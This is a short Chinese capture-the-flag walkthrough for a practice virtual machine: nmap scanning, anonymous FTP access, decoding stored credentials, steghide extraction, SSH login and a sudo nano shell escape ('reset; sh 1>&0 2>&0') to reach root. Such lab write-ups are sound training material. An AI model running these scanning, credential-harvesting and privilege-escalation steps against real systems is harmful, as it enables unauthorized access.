1.用kali作为攻击机

查找靶机的ip

kaili和靶机都设为NAT模式

nmap -sn 192.168.51.0/24

2.扫描端口

nmap -p- 192.168.51.132

3.访问页面

4.查看21端口

登陆用户名weianonymous,密码为空

下载cred.txt和welcome

查看

cred.txt

解码一下

champ:password

welcome

5.登录一下

6.点击About Us会下载一个文件

7.查看文件

打开sudo

查看两张图片

steghide extract -sf funny.bmp

密码是sudo

steghide extract -sf funny.jpg

密码是空

查看user.txt

查看hint.py

根据上面发现的字符串推测是rot加密,解密一下

wtf:this one is a simple one

8.进行ssh连接

ssh wtf:@192.168.51.132 -p 55077

查看

获取到flag

再次查看

获得一个

USER=n00b
#aw3s0m3p@$$w0rd

9.切换到n00b账户

  1. sudo nano
  2. Ctrl+r ,Ctrl+x
  3. 输入 reset; sh 1>&0 2>&0

得到第二个flag

Logo

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐